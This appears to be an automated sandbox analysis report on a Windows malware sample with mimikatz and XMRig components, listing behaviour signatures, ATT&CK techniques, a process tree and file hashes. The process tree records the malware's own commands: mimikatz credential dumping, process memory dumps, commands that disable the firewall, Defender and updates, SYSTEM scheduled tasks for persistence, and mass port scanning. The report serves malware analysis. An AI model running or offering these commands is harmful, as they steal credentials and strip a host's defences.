Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
29-08-2024 18:03
General
-
Target
2024-08-29_2cf9508dcaaac1e2331229eaccd3cdb4_hacktools_icedid_mimikatz.exe
-
Size
10.9MB
-
MD5
2cf9508dcaaac1e2331229eaccd3cdb4
-
SHA1
0caefa55563379c110a4752474b4799f38d0346b
-
SHA256
c5ba6230bd314da333ca76da1c1cda4a8fb07789ee85feaf841906b8a809cc50
-
SHA512
caaa41a4bfb14979627bc44d4f8865f1cf65333340f39e83d85216460b09f1940f9118584c2e4e0de9bec8a30f2f8558615cdb79b9e682c4213135f27a8ea4d4
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (19523) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 36 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 47 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\mqwuhfzzz\znfeub.exe"C:\Windows\TEMP\mqwuhfzzz\znfeub.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-29_2cf9508dcaaac1e2331229eaccd3cdb4_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-29_2cf9508dcaaac1e2331229eaccd3cdb4_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gfuncgqi\zitgyhd.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\gfuncgqi\zitgyhd.exeC:\Windows\gfuncgqi\zitgyhd.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\gfuncgqi\zitgyhd.exeC:\Windows\gfuncgqi\zitgyhd.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gzhzydtbv\uubgcusib\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\gzhzydtbv\uubgcusib\wpcap.exeC:\Windows\gzhzydtbv\uubgcusib\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gzhzydtbv\uubgcusib\hcdfzcnbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gzhzydtbv\uubgcusib\Scant.txt2⤵
-
C:\Windows\gzhzydtbv\uubgcusib\hcdfzcnbq.exeC:\Windows\gzhzydtbv\uubgcusib\hcdfzcnbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\gzhzydtbv\uubgcusib\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gzhzydtbv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gzhzydtbv\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\gzhzydtbv\Corporate\vfshost.exeC:\Windows\gzhzydtbv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kduuybgbi" /ru system /tr "cmd /c C:\Windows\ime\zitgyhd.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kduuybgbi" /ru system /tr "cmd /c C:\Windows\ime\zitgyhd.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iutfgzgks" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gfuncgqi\zitgyhd.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "iutfgzgks" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gfuncgqi\zitgyhd.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ziqsfiiui" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mqwuhfzzz\znfeub.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ziqsfiiui" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mqwuhfzzz\znfeub.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 800 C:\Windows\TEMP\gzhzydtbv\800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 316 C:\Windows\TEMP\gzhzydtbv\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 2156 C:\Windows\TEMP\gzhzydtbv\2156.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 2632 C:\Windows\TEMP\gzhzydtbv\2632.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 2936 C:\Windows\TEMP\gzhzydtbv\2936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 2956 C:\Windows\TEMP\gzhzydtbv\2956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 680 C:\Windows\TEMP\gzhzydtbv\680.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 3744 C:\Windows\TEMP\gzhzydtbv\3744.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 3840 C:\Windows\TEMP\gzhzydtbv\3840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 3900 C:\Windows\TEMP\gzhzydtbv\3900.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 4000 C:\Windows\TEMP\gzhzydtbv\4000.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 3972 C:\Windows\TEMP\gzhzydtbv\3972.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 1280 C:\Windows\TEMP\gzhzydtbv\1280.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 1776 C:\Windows\TEMP\gzhzydtbv\1776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 4912 C:\Windows\TEMP\gzhzydtbv\4912.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 4908 C:\Windows\TEMP\gzhzydtbv\4908.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 820 C:\Windows\TEMP\gzhzydtbv\820.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 3672 C:\Windows\TEMP\gzhzydtbv\3672.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exeC:\Windows\TEMP\gzhzydtbv\bfbzkfznz.exe -accepteula -mp 4312 C:\Windows\TEMP\gzhzydtbv\4312.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\gzhzydtbv\uubgcusib\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\gzhzydtbv\uubgcusib\cngdgbzek.execngdgbzek.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\pujbqc.exeC:\Windows\SysWOW64\pujbqc.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\zitgyhd.exe1⤵
-
C:\Windows\ime\zitgyhd.exeC:\Windows\ime\zitgyhd.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gfuncgqi\zitgyhd.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gfuncgqi\zitgyhd.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\mqwuhfzzz\znfeub.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\mqwuhfzzz\znfeub.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
1.2MB
MD551d451dc01d511b62fef0e9799a63b66
SHA1603f09dcb67572ff5370489cc192b8a60331e3ed
SHA25633d5c85539c7a0a34d9dba5c34910646f59fde985181689f26e05b6aca67edbc
SHA512ba50205135621e933251ad83bb788cd55a7a6a965fc8dd63f753738ef7c95bc0c44d82d22bf4c5a468c6a1501462738d0f6c1c07e6b02a409ad74f9eb8c59f4e
-
Filesize
8.6MB
MD5cd466f999c10b4378bd75e082e58cd7c
SHA19199fe6b0f709161324cb63904a24e4a174ebfb4
SHA256b9994a2ba0e3b9efdeab7baa9c1571eadfc993d3fcb71a69fe7b099a85e557a8
SHA512f2dbae0a051e16df600f5864f6fcb9fc2eae45f783d2db120ad1f4dda065a7930c4cc23861b12b17a28a329c75fef00303fdfffd3ee3a028a3db5e24059382b3
-
Filesize
4.2MB
MD5b61032ddf5157f2d739dce9d0ce5f6f6
SHA17ec118c2d6baf33c53b109da6e7ead1d93f3755d
SHA256ad9d61aa6cbf01a6d591342c1487cb05ed49220221846dd1f87c6a10e798006f
SHA51292e55a42f5ec8532d669190de99a80a26305b380ad94d95415fad9327560808984e66053e36efa05895531c84d9e1bca8775845864ede6d22a4aa0984e338c6d
-
Filesize
7.6MB
MD5656734b5341a1a2924d4fca87ba2994e
SHA1ba16e053e46b722fe7c375df8f346301cccf770c
SHA25690d977e54ba83d08974822c2a2f641675efff63b54ba0b917b1edbf8b33aec66
SHA512deb2c3fb34ac93581f0c2112ecf304c44ca7f023bde14b707cb23b1649b1535ad8af27569140bc13b617d4b0de16cc764c270bd05dbbc68088d39c11abb55a15
-
Filesize
4.0MB
MD5d13b33a5d06481165b84f18df761b34d
SHA1133a1f73766d501e85594edc98ef46b65e6930f6
